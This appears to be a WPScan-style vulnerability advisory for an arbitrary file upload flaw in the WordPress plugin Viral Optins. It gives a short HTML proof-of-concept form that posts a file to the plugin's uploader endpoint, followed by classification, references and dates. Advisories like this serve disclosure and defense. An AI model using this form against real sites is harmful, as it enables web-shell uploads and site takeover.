Viral Optins - Arbitrary File Upload



Description
Affected versions and whether the issue has been remediated is unclear as the vendor website does not exist anymore.
Proof of Concept
<form method="POST" action="https://example.com/wp-content/plugins/viral-optins/api/uploader/file-uploader.php" enctype="multipart/form-data">
<input type="file" name="Filedata" />
<button>Upload!</button><br/>
</form>

Affects Plugin

no known fix

References

URL https://sinister.ly/Thread-WordPress-Viral-Optins-Plugins-Arbitrary-File-Upload-Vulnerability

Classification

Type UPLOAD
CWE CWE-434

Miscellaneous

Views 757
Verified No
WPVDB ID 10130

Timeline

Publicly Published 2017-06-13 (about 3 years ago)
Added 2020-03-13 (4 months ago)
Last Updated 2020-03-14 (4 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin